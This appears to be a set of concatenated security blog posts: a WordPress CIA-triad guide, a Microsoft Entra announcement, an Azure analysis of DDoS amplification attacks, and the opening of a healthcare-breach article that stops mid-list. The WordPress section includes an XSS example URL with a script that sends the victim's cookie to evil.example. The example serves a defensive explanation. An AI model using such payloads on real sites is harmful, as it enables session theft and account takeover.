The Cybersecurity CIA Triad: What You Need to Know as a WordPress Site Owner

One of the core concepts of cybersecurity is known as the CIA Triad. The triad has three pillars, each designed to address one aspect of securing data: Confidentiality, Integrity, and Availability.

The Confidentiality pillar prevents unauthorized access to data, the Integrity pillar ensures that data is only modified when and how it should be, and the Availability pillar ensures that data is accessible when it is needed. Employed in unison, these three pillars build an environment where data is properly protected from attack, compromise, and mishap.

While managing a website may not always feel like a cybersecurity role, a crucial purpose of any website is to maintain data, which calls for the use of the CIA Triad. Managing a WordPress site is no exception, even if you never actively write any code for it.

As you build or update a website, keep the CIA Triad in mind when deciding which plugins and functionality to include. User experience is often the main consideration, but it is just as important to research any plugin or theme you are considering, and to install only those that are well maintained and have no track record of serving as an attack vector in website data breaches. Ignoring any of the three pillars can leave a weakness in your website that impacts your site’s users or your business, which makes it important to understand how the Triad applies to managing a WordPress site.

Maintaining the Confidentiality of Privileged Data

The Confidentiality pillar of the CIA Triad is frequently in the public eye, especially when it fails. The basic concept is that any data that should be kept private is restricted to prevent unauthorized access. Privileged data on a WordPress site varies, but it includes administrator and user credentials as well as personally identifiable information (PII) like addresses and phone numbers. Depending on the purpose of the site, additional customer information may also be involved, especially if you run an e-commerce or membership website. Aside from personal data, you may also hold business data that should be kept confidential, so the concept of Confidentiality needs to be employed properly to protect all of this data from unauthorized access.

One thing to keep in mind is that unauthorized access can easily be accidental. Each page on a WordPress website can be set to require specific permissions for access. If you are publishing restricted information, you need to ensure that the page is not published publicly. Even when updating a page, a good practice is to check the post visibility before publishing any changes, so that restricted data cannot be accessed without the proper access level. The check is quick, and correcting a wrong visibility setting takes only a moment.

[Image: setting post visibility in the WordPress editor]
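For pages that must never be public, visibility can also be enforced in code. Below is a minimal sketch using core WordPress functions; the post ID is a hypothetical example.

```php
<?php
// A minimal sketch: force a restricted page back to private visibility if it
// was accidentally published publicly. The post ID (42) is hypothetical.
$post_id = 42;

if ( 'private' !== get_post_status( $post_id ) ) {
    wp_update_post( array(
        'ID'          => $post_id,
        // Private posts are visible only to logged-in users who hold the
        // read_private_posts / read_private_pages capability.
        'post_status' => 'private',
    ) );
}
```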

Malicious access must also be accounted for when managing a website. One of the most common types of attacks on web applications is cross-site scripting (XSS). XSS attacks are dangerous partly because they are often simple to carry out: frequently all the attacker needs is a specially crafted URL. If an XSS vulnerability is present on the website and an attacker can convince your users or administrators to click a link they have generated, they can steal cookies or perform actions using the victim’s session. If the vulnerability is stored XSS, a site administrator simply visiting the vulnerable page may be all the attacker needs to obtain admin access to the site. An attacker who obtains authentication cookies gains the same access to information on the website as the user or administrator the cookies were stolen from. On WordPress sites in particular, XSS vulnerabilities can be exploited to inject new administrative users or add backdoors via specially crafted JavaScript, making it easy for attackers to gain unauthorized access to sensitive information.

[Image: an example XSS alert dialog]
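To make the risk concrete, here is a minimal sketch of the vulnerable pattern and its fix, using WordPress’s esc_html() and wp_unslash() helpers; the query parameter and template are hypothetical examples.

```php
<?php
// Hypothetical reflected XSS: a search term echoed back without escaping.
// A crafted link such as
//   ?s=<script>new Image().src='https://evil.example/c?'+document.cookie</script>
// would execute in the victim's browser and leak their session cookie.
echo '<p>Results for: ' . $_GET['s'] . '</p>'; // vulnerable

// Escaping on output neutralizes any injected markup.
echo '<p>Results for: ' . esc_html( wp_unslash( $_GET['s'] ?? '' ) ) . '</p>'; // safe
```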

Unauthorized access to confidential information can have lasting negative effects on a business or website owner, but taking steps to secure this data goes a long way toward mitigating these risks. Whether you run a personal blog that collects subscriber email addresses or an online retail site, there will be data that should be protected from accidental and malicious access. Keeping the concept of Confidentiality in mind while building and updating your WordPress website is a critical part of protecting this data. Even if the initial research feels like a hassle, choosing plugins known for their security will save you time and money by helping you avoid a potential data breach in the future.

When researching themes and plugins, one aspect to consider is the developer’s transparency about vulnerabilities. A few disclosed and patched vulnerabilities likely means the developer actively fixes problems. A theme or plugin that lists no patched vulnerabilities in its changelog may be just as much of a concern as one that has had too many, especially if it has been around for a long time. The point is not simply whether a plugin or theme has had previously disclosed vulnerabilities, but how transparently its developers communicate about security.

Ensuring the Integrity of Site Data

Integrity is the pillar that defines how data is maintained and modified. The idea here is that data should only be modified by defined individuals, and any modification should be accurate and necessary as defined by the purpose of the data. Incorrect or unnecessary changes to data can cause confusion at a minimum, and can even have legal and financial consequences in some cases. While the Confidentiality pillar plays a role here, Integrity must be addressed independently to ensure that data being accessed has not been maliciously or accidentally compromised.

Capability checks are one way WordPress protects not only Confidentiality but also Integrity. Any plugin should use capability checks to ensure that the user changing site information, configuration, or stored data actually has permission to make those changes. From a site owner or maintainer perspective, this means researching plugins and testing any under consideration to confirm that data can only be changed by its owner, or by an appropriate level of editor or administrator. If data is available on the website in any form, it needs to be checked, because a vulnerable plugin could allow an attacker to change or delete data. Site settings and code are also data, and if their Integrity is compromised, the Confidentiality and Availability of all other data on the site can be compromised along with it.

[Code sample: a capability check in a WordPress plugin]
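As an illustration, here is a minimal sketch of what such a check looks like in a plugin’s form handler; the action name, nonce, and option key are hypothetical examples.

```php
<?php
// A hypothetical settings-save handler guarded by a capability check.
add_action( 'admin_post_myplugin_save', function () {
    // Refuse the request unless the user is allowed to manage site options.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'You do not have permission to do that.' );
    }

    // Verify the request came from the plugin's own form (CSRF protection).
    check_admin_referer( 'myplugin_save' );

    // Sanitize the submitted value before saving it.
    $value = sanitize_text_field( wp_unslash( $_POST['myplugin_setting'] ?? '' ) );
    update_option( 'myplugin_setting', $value );

    wp_safe_redirect( admin_url( 'options-general.php' ) );
    exit;
} );
```

The capability check and the nonce check serve different purposes: the first asks whether this user may do this at all, and the second asks whether the request really came from the plugin’s own form. Both are needed to protect Integrity.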

Because not every plugin properly uses capability checks, it is the site maintainer’s responsibility to ensure the Integrity of data. In addition to testing plugins for access errors, all user accounts should be properly maintained with appropriate access levels. In a business setting, this also means performing user audits and immediately removing or disabling the account of any employee who leaves the company. In many cases, separating the contributor and editor roles is good practice as well, since it puts more than one set of eyes on every change and helps catch errors. Integrity is all about proper maintenance of data, and both malicious intent and unintentional error must be taken into account to protect it.
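A periodic audit can be as simple as listing the accounts that hold the most powerful role. Here is a minimal sketch using WordPress’s get_users():

```php
<?php
// List every administrator account so stale or unexpected admins can be
// reviewed, downgraded, or removed during a user audit.
foreach ( get_users( array( 'role' => 'administrator' ) ) as $admin ) {
    printf(
        "%s <%s> registered %s\n",
        $admin->user_login,
        $admin->user_email,
        $admin->user_registered
    );
}
```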

Guaranteeing the Availability of All Data

The final pillar in the Triad is Availability. In this sense, Availability means that data is available when requested. For a WordPress website, this means the website is online, the database is accessible, and any data that should be available to a given user is available as long as they are logged in with the correct level of access. What Availability does not mean is that data is available to everyone at any time; the first two pillars must be taken into account when determining the Availability of data. Of the three pillars, Availability relies most heavily on infrastructure rather than on what most people would consider security.

Availability may be the most obvious pillar to the end user, as it is clear to them when a website is not available or the data they try to access won’t load. The end user may not always be able to tell when confidential information is accessed without authorization or when data is incorrectly modified, but a lack of Availability is always going to be obvious. WordPress websites have a lot of working parts, and for data in a WordPress site to be available on demand, all of those parts must work together flawlessly. This means that the website must be hosted somewhere reliable; fees associated with the domain name, hosting, or other parts of the infrastructure must be paid on time; TLS certificates need to be renewed on time; and the website software must be updated regularly.

Countless articles have been written on the importance of updating WordPress components to protect Confidentiality and Integrity, but updating for Availability is just as important. Again, limiting access and ensuring Integrity play a role here, as data can be deleted maliciously or accidentally, but proper maintenance of your website’s components is just as critical. As technologies change on web servers, or new features are added to the website, older components may become incompatible and cease to function. Keeping a proper maintenance schedule and testing functionality after each update are imperative parts of guaranteeing the Availability of your website and the data it contains.

I’m Not A Cybersecurity Expert, How Do I Use The CIA Triad?

Fortunately, you don’t need to be a cybersecurity expert to keep the CIA Triad concepts at the core of the work you do. Defining policies for maintenance schedules, for addressing problems with plugins, and even for publishing changes to data will guide your processes. Wordfence, including Wordfence Free, provides a number of tools to help you keep to these standards, including two-factor authentication (2FA) to protect user accounts, and alerts for outdated site components or suspicious activity. The Wordfence WAF blocks attacks that threaten your data’s Confidentiality and Integrity, and the Wordfence Scan detects malware and other indicators that your data’s Integrity may have been compromised. Wordfence Premium includes the most up-to-date WAF rules and malware signatures, as well as country blocking and our Real-Time IP Blocklist, which tracks the IPs attacking our users and blocks them before they even have a chance to threaten your site.

Wordfence also offers two additional services: Wordfence Care and Wordfence Response. Both services help maintain your site’s security by following the core principles of the CIA Triad. Our team of security experts begins with a complete security audit of your site to identify ways to improve your WordPress site’s data Confidentiality, through measures like TLS certificates and cryptographic standards. Our team also recommends best practices that improve the Integrity and Availability of your site’s data, such as maintaining regular backups and not using software with known vulnerabilities. Both Wordfence Care and Wordfence Response include monitoring of your WordPress site by our team of security professionals to ensure that your site’s Confidentiality, Integrity, and Availability are not compromised, and both services include security incident response and remediation. Wordfence Response offers the same service as Wordfence Care, but with 24/7/365 availability and a 1-hour response time.

Conclusion

Employing the CIA Triad will help any website owner or maintainer to manage the security of the data on the site, even if they are not specifically in a cybersecurity role. No matter who the website is for, the data on it needs to be confidential, accurate, and available. The concepts covered by the CIA Triad are here to guide decisions that will ensure this need is met. Employing these concepts will help you breathe easier knowing that you have minimized the chances of your data being compromised in an attack or accident.

Source :
https://www.wordfence.com/blog/2022/06/the-cybersecurity-cia-triad-what-you-need-to-know-as-a-wordpress-site-owner/

Secure access for a connected world: meet Microsoft Entra

What could the world achieve if we had trust in every digital experience and interaction?

This question has inspired us to think differently about identity and access, and today, we’re announcing our expanded vision for how we will help provide secure access for our connected world.

Microsoft Entra is our new product family that encompasses all of Microsoft’s identity and access capabilities. The Entra family includes Microsoft Azure Active Directory (Azure AD), as well as two new product categories: Cloud Infrastructure Entitlement Management (CIEM) and decentralized identity. The products in the Entra family will help provide secure access to everything for everyone, by providing identity and access management, cloud infrastructure entitlement management, and identity verification.

The need for trust in a hyperconnected world 

Technology has transformed our lives in amazing ways. It’s reshaped how we interact with others, how we work, cultivate new skills, engage with brands, and take care of our health. It’s redefined how we do business by creating entirely new ways of serving existing needs while improving the experience, quality, speed, and cost management.

Behind the scenes of all this innovation, millions and millions of connections happen every second between people, machines, apps, and devices so that they can share and access data. These interactions create exciting opportunities for how we engage with technology and with each other—but they also create an ever-expanding attack surface with more and more vulnerabilities for people and data that need to be addressed.

It’s become increasingly important—and challenging—for organizations to address these risks as they advance their digital initiatives. They need to remove barriers to innovation, without the fear of being compromised. They need to instill trust, not only in their digital experiences and services, but in every digital interaction that powers them—every point of access between people, machines, microservices, and things.

Our expanded vision for identity and access

When the world was simpler, controlling digital access was relatively straightforward. It was just a matter of setting up the perimeter and letting only the right people in.

But that’s no longer sustainable. Organizations simply can’t put up gates around everything—their digital estates are growing, changing, and becoming boundaryless. It’s virtually impossible to anticipate and address the unlimited number of access scenarios that can occur across an organization and its supply chain, especially when it includes third-party systems, platforms, applications, and devices outside the organization’s control.

Identity is not just about directories, and access is not just about the network. Security challenges have become much broader, so we need broader solutions. We need to secure access for every customer, partner, and employee—and for every microservice, sensor, network, device, and database.

And doing this needs to be simple. Organizations don’t want to deal with incomplete and disjointed solutions that solve only one part of the problem, work in only a subset of environments, and require duct tape and bubble gum to work together. They need access decisions to be as granular as possible and to automatically adapt based on real-time assessment of risk. And they need this everywhere: on-premises, Azure AD, Amazon Web Services, Google Cloud Platform, apps, websites, devices, and whatever comes next.

This is our expanded vision for identity and access, and we will deliver it with our new product family, Microsoft Entra.

[Video: Vasu Jakkal, Corporate Vice President, Security, Compliance, Identity and Management, and Joy Chik, Corporate Vice President of Identity, unveil Microsoft Entra, the new identity and access product family, and discuss the future of modern identity and access security.]

Making the vision a reality: Identity as a trust fabric

To make this vision a reality, identity must evolve. Our interconnected world requires a flexible and agile model in which people, organizations, apps, and even smart devices can confidently make real-time access decisions. We need to build upon and expand our capabilities to support all the scenarios our customers are facing.

Moving forward, we’re expanding our identity and access solutions so that they can serve as a trust fabric for the entire digital ecosystem—now and long into the future.

Microsoft Entra will verify all types of identities and secure, manage, and govern their access to any resource. The new Microsoft Entra product family will:

  • Protect access to any app or resource for any user.
  • Secure and verify every identity across hybrid and multicloud environments.
  • Discover and govern permissions in multicloud environments.
  • Simplify the user experience with real-time intelligent access decisions.

This is an important step towards delivering a comprehensive set of products for identity and access needs, and we’ll continue to expand the Microsoft Entra product family.

“Identity is one of the cornerstones of our cybersecurity for the future.”

—Thomas Mueller-Lynch, Service Owner Lead for Digital Identity, Siemens

Microsoft Entra at a glance

Microsoft Azure AD, our hero identity and access management product, will be part of the Microsoft Entra family, and all its capabilities that our customers know and love, such as Conditional Access and passwordless authentication, remain unchanged. Azure AD External Identities continues to be our identity solution for customers and partners under the Microsoft Entra family.

Additionally, we are adding new solutions and announcing several product innovations as part of the Entra family.

[Image: solutions in the Microsoft Entra product family, including Microsoft Azure Active Directory, Permissions Management, and Verified ID]

Reduce access risk across clouds

The adoption of multicloud has led to a massive increase in identities, permissions, and resources across public cloud platforms. Most identities are over-provisioned, expanding organizations’ attack surface and increasing the risk of accidental or malicious permission misuse. Without visibility across cloud providers, or tools that provide a consistent experience, it’s become incredibly challenging for identity and security teams to manage permissions and enforce the principle of least privilege across their entire digital estate.

With the acquisition of CloudKnox Security last year, we are now the first major cloud provider to offer a CIEM solution: Microsoft Entra Permissions Management. It provides comprehensive visibility into permissions for all identities (both user and workload), actions, and resources across multicloud infrastructures. Permissions Management helps detect, right-size, and monitor unused and excessive permissions, and mitigates the risk of data breaches by enforcing the principle of least privilege in Microsoft Azure, Amazon Web Services, and Google Cloud Platform. Microsoft Entra Permissions Management will be a standalone offering generally available worldwide in July 2022 and will also be integrated within the Microsoft Defender for Cloud dashboard, extending Defender for Cloud’s protection with CIEM.
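To illustrate the right-sizing idea in the abstract (this is a toy sketch, not the Permissions Management API), excess permissions are simply those granted but never observed in use:

```php
<?php
// Toy illustration of permissions right-sizing: compare granted actions to
// actions actually used, and flag the excess. All names are hypothetical.
$granted = array( 'storage.read', 'storage.write', 'vm.start', 'vm.delete' );
$used    = array( 'storage.read', 'vm.start' );

$excess = array_diff( $granted, $used );
printf( "Unused permissions to consider removing: %s\n", implode( ', ', $excess ) );
```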

Additionally, with the preview of workload identity management in Microsoft Entra, customers can assign and secure identities for any app or service hosted in Azure AD by extending the reach of access control and risk detection capabilities.

Enable secure digital interactions that respect privacy

At Microsoft, we deeply value, protect, and defend privacy, and nowhere is privacy more important than your personal identity. After several years of working alongside the decentralized identity community, we’re proud to announce a new product offering: Microsoft Entra Verified ID, based on decentralized identity standards. Verified ID implements the industry standards that make portable, self-owned identity possible. It represents our commitment to an open, trustworthy, interoperable, and standards-based decentralized identity future for individuals and organizations. Instead of granting broad consent to countless apps and services and spreading identity data across numerous providers, Verified ID allows individuals and organizations to decide what information they share, when they share it, with whom they share it, and—when necessary—take it back.

The potential scenarios for decentralized identity are endless. When we can verify the credentials of an organization in less than a second, we can conduct business-to-business and business-to-customer transactions with greater efficiency and confidence. Conducting background checks becomes faster and more reliable when individuals can digitally store and share their education and certification credentials. Managing our health becomes less stressful when both doctor and patient can verify each other’s identity and trust that their interactions are private and secure. Microsoft Entra Verified ID will be generally available in early August 2022.

“We thought, ‘Wouldn’t it be fantastic to take a world-leading technology like Microsoft Entra and implement Verified ID for employees in our own office environment?’ We easily identified business opportunities where it would help us work more efficiently.”

—Chris Tate, Chief Executive Officer, Condatis

Automate critical Identity Governance scenarios

Next, let’s focus on Identity Governance for employees and partners. It’s an enormous challenge for IT and security teams to provision new users and guest accounts and manage their access rights manually. This can have a negative impact on both IT and individual productivity. New employees often experience a slow ramp-up to full effectiveness while they wait for the access required for their jobs. Similar delays in granting necessary access to guest users undermine a smoothly functioning supply chain. Then, without formal or automated processes for reprovisioning or deactivating people’s accounts, their access rights may remain in place when they change roles or exit the organization.

Identity Governance addresses this with identity lifecycle management, which simplifies the processes for onboarding and offboarding users. Lifecycle workflows automate assigning and managing access rights, and monitoring and tracking access, as user attributes change. Lifecycle workflows in Identity Governance will enter public preview in July 2022.

“We were so reactive for so long with old technology, it was a struggle. [With Azure AD Identity Governance] we’re finally able to be proactive, and we can field some of those complex requests from the business side of our organization.”

—Sally Harrison, Workplace Modernization Consultant, Mississippi Division of Medicaid

Create possibilities, not barriers

Microsoft Entra embodies our vision for what modern secure access should be. Identity should be an entryway into a world of new possibilities, not a blockade restricting access, creating friction, and holding back innovation. We want people to explore, to collaborate, to experiment—not because they are reckless, but because they are fearless.

Visit the Microsoft Entra website to learn more about how Azure AD, Microsoft Entra Permissions Management, and Microsoft Entra Verified ID deliver secure access for our connected world.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

Source :
https://www.microsoft.com/security/blog/2022/05/31/secure-access-for-a-connected-worldmeet-microsoft-entra/

Anatomy of a DDoS amplification attack

Amplification attacks are one of the most common distributed denial of service (DDoS) attack vectors. These attacks are typically categorized as flooding or volumetric attacks, in which the attacker succeeds in generating more traffic than the target can process, exhausting its resources.

In this blog, we start by surveying the anatomy and landscape of amplification attacks, providing statistics from Azure on the most common attack vectors, volumes, and distribution. We then describe some of the countermeasures taken in Azure to mitigate amplification attacks.

DDoS amplification attacks, what are they? 

Reflection attacks involve three parties: an attacker, a reflector, and a target. The attacker spoofs the IP address of the target to send a request to a reflector (e.g., an open server or middlebox) that responds to the target, a virtual machine (VM) in this case. For the attack to be amplified, the response should be larger than the request, resulting in a reflected amplification attack. The attacker’s motivation is to create the largest reflection out of the smallest requests, which they achieve by finding many reflectors and crafting the requests that result in the highest amplification.

Figure 1. Reflected amplification attack against a target virtual machine hosted in Azure
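The economics of the attack come down to a single ratio: the amplification factor is the response size divided by the request size. A minimal sketch, with assumed packet sizes:

```php
<?php
// The byte counts below are assumptions for illustration, not measurements.
$request_bytes  = 60;   // small spoofed query sent to the reflector
$response_bytes = 4320; // large answer reflected to the target

printf( "amplification factor: x%.0f\n", $response_bytes / $request_bytes ); // x72
```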

The root cause of reflected amplification attacks is that an attacker can force reflectors to respond to targets by spoofing the source IP address; if spoofing were not possible, this attack vector would be mitigated. Much effort has therefore gone into disabling IP source address spoofing, and many organizations now prevent spoofing so that attackers cannot leverage their networks for amplification attacks. Unfortunately, a significant number of organizations still allow source spoofing: the Spoofer project shows that a third of IPv4 autonomous systems allow or partially allow spoofing.

UDP and TCP amplification attacks 

Most attackers utilize UDP to launch amplification attacks, since reflecting traffic with a spoofed IP source address is possible due to the lack of a proper handshake.

While UDP makes it easy to launch reflected amplification attacks, TCP’s 3-way handshake complicates spoofing attacks, so IP source address spoofing is restricted to the start of the handshake. Although the TCP handshake allows for reflection, it does not allow for easy amplification, since the TCP SYN+ACK response is not larger than the TCP SYN. Moreover, because the TCP SYN+ACK response is sent to the target, the attacker never receives it and cannot learn the critical information it contains, which is needed to complete the 3-way handshake and continue making requests on behalf of the target.

Figure 2. Reflection attack in TCP: the attacker sends a spoofed SYN, and the reflector’s SYN+ACK retransmissions arrive as out-of-state traffic at the target

In recent years, however, reflection and amplification attacks based on TCP have started emerging.  

Independent research found newer TCP reflected amplification vectors that utilize middleboxes, such as nation-state censorship firewalls and other deep packet inspection devices, to launch volumetric floods. Middlebox devices may be deployed in asymmetric routing environments, where they only see one side of the TCP connection (e.g., packets from clients to servers). To overcome this asymmetry, such middleboxes often implement a non-compliant TCP stack. Attackers take advantage of this misbehavior: they do not need to complete the 3-way handshake, and can instead generate a sequence of requests that elicit amplified responses from middleboxes, reaching infinite amplification in some cases. The industry has started witnessing these kinds of attacks from censorship and enterprise middleboxes, such as firewalls and IDPS devices, and we expect this trend to grow as attackers look for more ways to create havoc utilizing DDoS as a primary weapon.

Carpet bombing is another example of a reflected amplification attack. It often utilizes UDP reflection, and in recent years TCP reflection as well. With carpet bombing, instead of focusing the attack on a single destination or a few destinations, the attacker attacks many destinations within a specific subnet or classless inter-domain routing (CIDR) block (for example, a /22). This makes the attack more difficult to detect and mitigate, since it can fly below prevalent baseline-based detection mechanisms.
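One way to reason about detecting carpet bombing is to aggregate traffic per prefix rather than per destination address. The sketch below is a simplified illustration, not Azure’s detection pipeline; the flow records and threshold are hypothetical.

```php
<?php
// Aggregate per-destination traffic into /22 blocks so an attack spread
// thinly across a subnet still crosses a threshold.
$flows = array( // destination IP => packets per second
    '203.0.113.7'   => 9000,
    '203.0.113.89'  => 8700,
    '203.0.113.150' => 9100,
);

$per_block = array();
foreach ( $flows as $ip => $pps ) {
    // Mask the address down to its covering /22 network.
    $block = long2ip( ip2long( $ip ) & 0xFFFFFC00 ) . '/22';
    $per_block[ $block ] = ( $per_block[ $block ] ?? 0 ) + $pps;
}

foreach ( $per_block as $block => $pps ) {
    if ( $pps > 20000 ) { // per-prefix threshold a per-IP baseline would miss
        printf( "possible carpet bombing against %s (%d pps)\n", $block, $pps );
    }
}
```

No single destination here exceeds 10,000 pps, yet the /22 as a whole carries nearly 27,000 pps, which is exactly the signal a per-IP baseline would miss.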

Figure 3. Carpet bombing attack: reflectors send spoofed packets to many targets within a subnet hosted in Azure

One example of TCP carpet bombing is TCP SYN+ACK reflection, where the attacker sends a spoofed SYN to a wide range of random or pre-selected reflectors. In this attack, the amplification comes from reflectors that retransmit the TCP SYN+ACK when they do not get a response. The amplification of the TCP SYN+ACK response itself may not be large, and it depends on the number of retransmissions sent by the reflector. In Figure 3, the reflected attack traffic towards each target virtual machine (VM) may not be enough to bring it down; collectively, however, the traffic may well overwhelm the targets’ network.
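Because the amplification comes from retransmissions, the effective factor is roughly one plus the retry count. A back-of-the-envelope model, with all numbers assumed for illustration:

```php
<?php
// Every spoofed SYN elicits one SYN+ACK plus several retransmissions when
// the target never completes the handshake.
$spoofed_syn_pps = 5000000; // attacker's spoofed SYN rate across all reflectors
$retransmissions = 5;       // SYN+ACK retries per unanswered connection

$reflected_pps = $spoofed_syn_pps * ( 1 + $retransmissions );
printf( "~%d million SYN+ACK pps arriving at the targets\n", $reflected_pps / 1000000 ); // ~30 million
```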

UDP and TCP amplification attacks in Azure 

In Azure, we continuously work to mitigate inbound (from internet to Azure) and outbound (from Azure to internet) amplification attacks. In the last 12 months, we mitigated approximately 175,000 UDP reflected amplification attacks. We monitored more than 10 attack vectors; the most common were NTP with 49,700 attacks, DNS with 42,600, SSDP with 27,100, and Memcached with 18,200. These protocols can demonstrate amplification factors of up to x4,670, x98, x76, and x9,000 respectively.
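To put those factors in perspective, here is a back-of-the-envelope estimate of the reflected volume an attacker could generate from a hypothetical 1 Gbps uplink of spoofed requests, using the maximum factors above:

```php
<?php
// Reflected volume = attacker uplink x amplification factor (upper bound).
$factors = array( 'NTP' => 4670, 'DNS' => 98, 'SSDP' => 76, 'Memcached' => 9000 );
$attacker_uplink_gbps = 1; // hypothetical figure for illustration

foreach ( $factors as $protocol => $factor ) {
    printf( "%-9s up to ~%d Gbps at the target\n", $protocol, $attacker_uplink_gbps * $factor );
}
```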

Figure 4. UDP reflected amplification attacks observed from April 1, 2021, to March 31, 2022 (NTP accounts for the largest share at 28%; OpenVPN the smallest at 2%)

We measured the maximum attack throughput in packets per second for a single attack across all attack vectors. The highest throughput was a 58 million packets per second (pps) SSDP flood in August last year, in a short attack campaign that lasted 20 minutes on a single resource in Azure. 

Figure 5. Maximum pps recorded for a single attack observed from April 1, 2021, to March 31, 2022 (from 58 million pps for SSDP down to under 10 million pps for CharGEN)

TCP reflected amplification attacks are becoming more prevalent, with new attack vectors discovered. We encounter these attacks on Azure resources utilizing diverse types of reflectors and attack vectors. 

One such example is a TCP SYN+ACK reflected amplification attack on an Azure resource in Asia. The attack reached 30 million pps and lasted 15 minutes. The throughput was not especially high; however, approximately 900 reflectors were involved, each with retransmissions, resulting in a pps rate high enough to bring down the host and other network infrastructure elements.

Figure 6. TCP SYN+ACK amplification attack volume on an Azure resource in Asia: a spike reaching 30 million pps over a 15-minute window

We see many TCP SYN+ACK retransmissions associated with reflectors that never receive an ACK response from the spoofed source. Here is an example of such a retransmission:

[Screenshot: a TCP SYN+ACK retransmission that never receives an ACK, showing source, destination, and protocol]

The retransmitted packet was sent 60 seconds after the first. 

Mitigating amplification attacks in Azure 

Reflected amplification attacks are here to stay and pose a serious challenge for the internet community. They continue to evolve and exploit new vulnerabilities in protocols and software implementations to bypass conventional countermeasures. Minimizing their effect requires collaboration across the industry: it is not enough to mitigate such attacks at a single location with a pinpoint mitigation strategy. It requires intertwining network and DDoS mitigation capabilities.

Azure’s network is one of the largest on the globe. We combine multiple DDoS strategies across our network and DDoS mitigation pipeline to combat reflected amplification DDoS attacks.

On the network side, we continuously optimize and implement various traffic monitoring, traffic engineering, and quality of service (QoS) techniques to block reflected amplification attacks right at the routing infrastructure. We implement these mechanisms at the edge and core of our wide area network (WAN), as well as within the data centers. For inbound traffic (from the internet), this allows us to mitigate attacks right at the edge of our network. Similarly, outbound attacks (those that originate from within our network) are blocked right at the data center, without exhausting our WAN or ever leaving our network.

On top of that, our dedicated DDoS mitigation pipeline continuously evolves to offer advanced mitigation techniques against such attacks. This mitigation pipeline offers another layer of protection, on top of our DDoS networking strategies. Together, these two protection layers provide comprehensive coverage against the largest and most sophisticated reflected amplification attacks.  

Since reflected amplification attacks are typically volumetric, it is not enough to implement advanced mitigation strategies; we must also maintain a highly scalable mitigation pipeline that can cope with the largest attacks. Our mitigation pipeline can mitigate more than 60 Tbps globally, and we continue to evolve it by adding mitigation capacity across all network layers.

Different attack vectors require different treatment 

UDP-based reflected amplification attacks are tracked, monitored, detected, and mitigated for all attack vectors. There are various mitigation techniques to combat these attacks, including anomaly detection across attacked IP addresses, L4 protocols, and tracking of spoofed source IPs. Since UDP reflected amplification attacks often create fragmented packets, we monitor IP fragments to mitigate them successfully.  
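As a rough illustration of what baseline-based detection can look like (Azure’s actual pipeline is more sophisticated and not public), here is a minimal sketch using an exponentially weighted moving average (EWMA) over per-second packet counts, with assumed numbers throughout:

```php
<?php
// Flag samples far above an EWMA baseline of packets per second for one IP.
$pps_samples = array( 1200, 1100, 1300, 1250, 90000, 95000 );

$alpha    = 0.2;  // smoothing factor: how fast the baseline adapts
$baseline = null;

foreach ( $pps_samples as $pps ) {
    if ( null !== $baseline && $pps > 5 * $baseline ) {
        printf( "anomaly: %d pps vs baseline %.0f\n", $pps, $baseline );
        continue; // don't let attack traffic pollute the baseline
    }
    $baseline = ( null === $baseline ) ? $pps : $alpha * $pps + ( 1 - $alpha ) * $baseline;
}
```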

TCP-based reflected amplification attacks take advantage of poor TCP stack implementations, together with a large set of reflectors and targets, to launch such attacks. We adapt our mitigation strategies so we can detect and block attacks from both attackers and reflectors. We employ a set of mitigations to address TCP SYN, TCP SYN+ACK, TCP ACK, and other TCP-based attacks. Mitigation combines TCP authentication mechanisms that identify spoofed packets with anomaly detection that blocks attack traffic when data is appended to TCP packets to trigger amplification with reflectors.

Figure 7. Amplification attack detection: spoofed attacks are blocked whether they come from an attacker or attacker-controlled reflector outside Azure targeting resources inside, or originate within Azure and travel through reflectors toward targets elsewhere

Get started with Azure DDoS Protection to protect against amplification attacks 

Azure’s DDoS mitigation platform has mitigated the largest DDoS attacks in history by employing a globally distributed DDoS protection platform that scales beyond 60 Tbps. We ensure our platform and customers’ workloads are always protected against DDoS attacks. To enhance our DDoS posture, we continuously collaborate with other industry players to fight reflected amplification attacks.

Azure customers are protected against Layer 3 and Layer 4 DDoS attacks as part of protecting our infrastructure and cloud platform. In addition, Azure DDoS Protection Standard provides comprehensive protection for customers by auto-tuning the detection policy to the specific traffic patterns of the protected application. This ensures that whenever traffic patterns change, such as during a flash crowd event, the DDoS policy is automatically updated to reflect those changes for optimal protection. When a reflected amplification attack is launched against a protected application, our detection pipeline detects it automatically based on the auto-tuned policy. The mitigation policy, which is set automatically for customers without any need for manual configuration, includes the countermeasures needed to block reflected amplification attacks.

Protection is simple to enable on any new or existing virtual network and does not require any application or resource changes. Our recently released Azure built-in policies allow for better management of network security compliance by making it easy to onboard all your virtual network resources and configure logging.

To strengthen the security posture of applications, Azure’s network security services can work in tandem to secure your workloads, where DDoS protection is one of the tools we provide. Organizations that pursue zero trust architecture can benefit from our services to achieve better protection. 

Learn more about Azure DDoS Protection Standard 

Amir Dahan and Syed Pasha
Azure Networking Team


Source :
https://www.microsoft.com/security/blog/2022/05/23/anatomy-of-ddos-amplification-attacks/

Why Healthcare Must Do More (and Do Better) to Ensure Patient Safety

With attacks on healthcare rising dramatically, SonicWall’s Capture Cloud Platform helps ensure patient care delivery is more efficient, resilient and secure.

Within the last 30 days, data breaches at nearly 40 healthcare organizations across 20 U.S. states compromised almost 1.8 million individual records, according to the U.S. Department of Health and Human Services (HHS).

Unfortunately, this is just a snapshot of what’s shaping up to be another blistering year: The HHS breach disclosure report indicates that more than 9.5 million records have been affected thus far in 2022 (Figure 1), following last year’s record high of almost 45 million patients impacted.

As the frequency of attacks on the healthcare sector continues to rise worldwide — with recent attacks in Costa Rica, France and Canada, among many others — the global total is sure to be much higher.

How Healthcare Hacks Occur

Hacking incidents involving network servers and email remain the leading attack vectors, making up more than 80% of the total count (Figure 2).

[Figure 1: Healthcare records affected by breaches in 2022, per HHS breach disclosures]

[Figure 2: Leading attack vectors in healthcare breaches]

Each patient profile contains rich demographic and health information, including the 18 identifiers defined under the HIPAA Privacy Rule:

  1. Name
  2. Addresses
  3. All dates, including the individual’s birthdate, admission date, discharge date, date of death, etc.
  4. Telephone numbers
  5. Fax number
  6. Email address
  7. Social Security Number (SSN)
  8. Medical record number
  9. Health plan beneficiary number
  10. Account number
  11. Certificate or license number
  12. Vehicle identifiers and serial numbers, including license plate numbers
  13. Device identifiers and serial numbers
  14. Web URL
  15. Internet Protocol (IP) address
  16. Biometric identifiers, such as finger or voice print
  17. Full-face photo
